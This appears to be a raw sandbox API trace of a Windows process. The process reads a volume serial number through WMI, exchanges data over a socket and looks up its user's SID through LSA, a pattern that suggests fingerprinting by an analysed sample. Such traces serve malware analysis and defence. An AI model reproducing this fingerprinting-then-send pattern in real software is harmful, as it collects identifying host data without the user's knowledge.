	[0196.606] IMarshal:GetUnmarshalClass (in: This=0x1cc38418, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bca0 | out: pCid=0x1c68bca0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0196.606] IUnknown:Release (This=0x1cc38418) returned 0x3
	[0196.606] CoGetContextToken (in: pToken=0x1c68bc80 | out: pToken=0x1c68bc80) returned 0x0
	[0196.606] IUnknown:AddRef (This=0x1cc38410) returned 0x4
	[0196.606] IUnknown:QueryInterface (in: This=0x1cc38410, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bd98 | out: ppvObject=0x1c68bd98*=0x0) returned 0x80004002
	[0196.606] IUnknown:Release (This=0x1cc38410) returned 0x3
	[0196.607] IUnknown:Release (This=0x1cc38410) returned 0x2
	[0196.607] CoGetContextToken (in: pToken=0x1c68c140 | out: pToken=0x1c68c140) returned 0x0
	[0196.607] CoGetContextToken (in: pToken=0x1c68c080 | out: pToken=0x1c68c080) returned 0x0
	[0196.607] IUnknown:AddRef (This=0x1cc38410) returned 0x3
	[0196.607] IUnknown:QueryInterface (in: This=0x1cc38410, riid=0x1c68c1c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c1a0 | out: ppvObject=0x1c68c1a0*=0x1cc38410) returned 0x0
	[0196.607] IUnknown:Release (This=0x1cc38410) returned 0x3
	[0196.607] IUnknown:Release (This=0x1cc38410) returned 0x2
	[0196.607] IUnknown:Release (This=0x1cc38410) returned 0x1
	[0196.607] CoTaskMemFree (pv=0x1b88a250) 
	[0196.608] CoGetContextToken (in: pToken=0x1c68cac0 | out: pToken=0x1c68cac0) returned 0x0
	[0196.608] IUnknown:AddRef (This=0x1cc38410) returned 0x2
	[0196.608] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__GENUS", lFlags=0, pVal=0x1c68cc30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cc2c*=0, plFlavor=0x1c68cc28*=0 | out: pVal=0x1c68cc30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cc2c*=3, plFlavor=0x1c68cc28*=64) returned 0x0
	[0196.608] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__PATH", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c68cbcc*=8, plFlavor=0x1c68cbc8*=64) returned 0x0
	[0196.608] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0196.608] CoGetObjectContext (in: riid=0x1c68cb68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb60 | out: ppv=0x1c68cb60*=0x221868) returned 0x0
	[0196.608] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cb80 | out: pAptType=0x1c68cb80*=1) returned 0x0
	[0196.608] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cc88 | out: ppvObject=0x1c68cc88*=0x0) returned 0x80004002
	[0196.608] IUnknown:Release (This=0x221868) returned 0x1
	[0196.609] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c1f0 | out: ppv=0x1c68c1f0*=0x1cc318c0) returned 0x0
	[0196.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc318c0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf00 | out: ppvObject=0x1c68bf00*=0x0) returned 0x80004002
	[0196.609] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc318c0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bee8 | out: ppvObject=0x1c68bee8*=0x1cc3a150) returned 0x0
	[0196.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3a150, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bdf0 | out: ppvObject=0x1c68bdf0*=0x1cc3a150) returned 0x0
	[0196.610] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3a150, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68be70 | out: ppvObject=0x1c68be70*=0x0) returned 0x80004002
	[0196.610] WbemDefPath:IUnknown:AddRef (This=0x1cc3a150) returned 0x3
	[0196.610] CoGetContextToken (in: pToken=0x1c68bac0 | out: pToken=0x1c68bac0) returned 0x0
	[0196.610] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3a150, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ba80 | out: ppvObject=0x1c68ba80*=0x1b886bf0) returned 0x0
	[0196.610] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b886bf0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bab0 | out: pCid=0x1c68bab0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.610] WbemDefPath:IUnknown:Release (This=0x1b886bf0) returned 0x3
	[0196.610] CoGetContextToken (in: pToken=0x1c68ba90 | out: pToken=0x1c68ba90) returned 0x0
	[0196.610] WbemDefPath:IUnknown:AddRef (This=0x1cc3a150) returned 0x4
	[0196.611] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3a150, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bba8 | out: ppvObject=0x1c68bba8*=0x0) returned 0x80004002
	[0196.611] WbemDefPath:IUnknown:Release (This=0x1cc3a150) returned 0x3
	[0196.611] WbemDefPath:IUnknown:Release (This=0x1cc3a150) returned 0x2
	[0196.611] WbemDefPath:IUnknown:Release (This=0x1cc318c0) returned 0x0
	[0196.611] WbemDefPath:IUnknown:Release (This=0x1cc3a150) returned 0x1
	[0196.611] CoGetContextToken (in: pToken=0x1c68c7c0 | out: pToken=0x1c68c7c0) returned 0x0
	[0196.611] CoGetContextToken (in: pToken=0x1c68c700 | out: pToken=0x1c68c700) returned 0x0
	[0196.611] WbemDefPath:IUnknown:AddRef (This=0x1cc3a150) returned 0x2
	[0196.611] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3a150, riid=0x1c68c840*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c820 | out: ppvObject=0x1c68c820*=0x1cc3a150) returned 0x0
	[0196.611] WbemDefPath:IUnknown:Release (This=0x1cc3a150) returned 0x2
	[0196.612] WbemDefPath:IUnknown:Release (This=0x1cc3a150) returned 0x1
	[0196.612] CoGetContextToken (in: pToken=0x1c68c940 | out: pToken=0x1c68c940) returned 0x0
	[0196.612] CoGetContextToken (in: pToken=0x1c68c880 | out: pToken=0x1c68c880) returned 0x0
	[0196.612] WbemDefPath:IUnknown:AddRef (This=0x1cc3a150) returned 0x2
	[0196.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3a150, riid=0x1c68c9c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9a0 | out: ppvObject=0x1c68c9a0*=0x1cc3a150) returned 0x0
	[0196.612] WbemDefPath:IUnknown:Release (This=0x1cc3a150) returned 0x2
	[0196.612] WbemDefPath:IUnknown:AddRef (This=0x1cc3a150) returned 0x3
	[0196.612] WbemDefPath:IWbemPath:SetText (This=0x1cc3a150, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0196.612] WbemDefPath:IUnknown:Release (This=0x1cc3a150) returned 0x2
	[0196.612] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cc00 | out: puCount=0x1c68cc00*=0x2) returned 0x0
	[0196.612] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cc00*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc00*=0x17, pszText=0x0) returned 0x0
	[0196.612] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cc00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.612] CoTaskMemAlloc (cb=0x8) returned 0x1b88a250
	[0196.613] IEnumWbemClassObject:Next (in: This=0x1cc38368, lTimeout=-1, uCount=0x1, apObjects=0x1b88a250, puReturned=0x1c68ccb8 | out: apObjects=0x1b88a250*=0x0, puReturned=0x1c68ccb8*=0x0) returned 0x1
	[0196.793] CoTaskMemFree (pv=0x1b88a250) 
	[0196.793] CoGetContextToken (in: pToken=0x1c68ca40 | out: pToken=0x1c68ca40) returned 0x0
	[0196.793] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x1
	[0196.793] IUnknown:Release (This=0x1cc38368) returned 0x0
	[0196.804] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0196.804] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0196.804] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.804] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0196.804] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.804] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0196.804] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.804] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0196.804] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0196.804] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.804] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__CLASS", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0196.805] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.805] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__CLASS", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0196.805] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.805] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0196.805] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0196.805] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.805] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0196.805] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0196.805] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.806] IWbemClassObject:GetNames (in: This=0x1cc38410, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c68cce8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c68cce0 | out: pNames=0x1c68cce0*="\x01ƀ\x08") returned 0x0
	[0196.806] SafeArrayGetDim (psa=0x1b876640) returned 0x1
	[0196.806] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__GENUS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.807] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__CLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.807] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.807] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.807] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0196.807] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__DYNASTY", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.807] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0196.807] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__RELPATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.807] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0196.807] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.807] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__DERIVATION", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b876640*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b885bc0, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x1c68ccdc*=8200, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.808] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__SERVER", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.808] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0196.808] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.808] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.808] IWbemClassObject:Get (in: This=0x1cc38410, wszName="__PATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0196.808] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0196.808] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cd80 | out: puCount=0x1c68cd80*=0x2) returned 0x0
	[0196.808] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd80*=0x17, pszText=0x0) returned 0x0
	[0196.808] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.808] IWbemClassObject:Get (in: This=0x1cc38410, wszName="SerialNumber", lFlags=0, pVal=0x1c68cd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd6c*=0, plFlavor=0x1c68cd68*=0 | out: pVal=0x1c68cd70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c68cd6c*=19, plFlavor=0x1c68cd68*=0) returned 0x0
	[0196.809] IWbemClassObject:Get (in: This=0x1cc38410, wszName="SerialNumber", lFlags=0, pVal=0x1c68cfa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cf9c*=19, plFlavor=0x1c68cf98*=0 | out: pVal=0x1c68cfa0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c68cf9c*=19, plFlavor=0x1c68cf98*=0) returned 0x0
	[0196.814] send (s=0x408, buf=0x2f53380*, len=36, flags=0) returned 36
	[0196.814] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 88
	[0196.820] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0196.824] send (s=0x408, buf=0x2f664a8*, len=34, flags=0) returned 34
	[0196.824] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 121
	[0197.628] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0197.629] GetCurrentProcess () returned 0xffffffffffffffff
	[0197.629] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cd58 | out: TokenHandle=0x1c68cd58*=0x4a8) returned 1
	[0197.630] GetCurrentProcess () returned 0xffffffffffffffff
	[0197.630] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68ce28 | out: TokenHandle=0x1c68ce28*=0x4ac) returned 1
	[0197.631] GetTokenInformation (in: TokenHandle=0x4a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1c68ce18 | out: TokenInformation=0x0, ReturnLength=0x1c68ce18) returned 0
	[0197.631] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b876630
	[0197.631] GetTokenInformation (in: TokenHandle=0x4a8, TokenInformationClass=0x1, TokenInformation=0x1b876630, TokenInformationLength=0x2c, ReturnLength=0x1c68ce18 | out: TokenInformation=0x1b876630, ReturnLength=0x1c68ce18) returned 1
	[0197.631] LocalFree (hMem=0x1b876630) returned 0x0
	[0197.632] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x1c68cc48, DesiredAccess=0x800, PolicyHandle=0x1c68cc40 | out: PolicyHandle=0x1c68cc40) returned 0x0
	[0197.669] LsaLookupSids (in: PolicyHandle=0x1b876630, Count=0x1, Sids=0x2f78758*=0x2f786b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x1c68ccd0, Names=0x1c68ccc8 | out: ReferencedDomains=0x1c68ccd0, Names=0x1c68ccc8) returned 0x0
	[0197.670] LsaClose (ObjectHandle=0x1b876630) returned 0x0
	[0197.670] LsaFreeMemory (Buffer=0x2656f0) returned 0x0
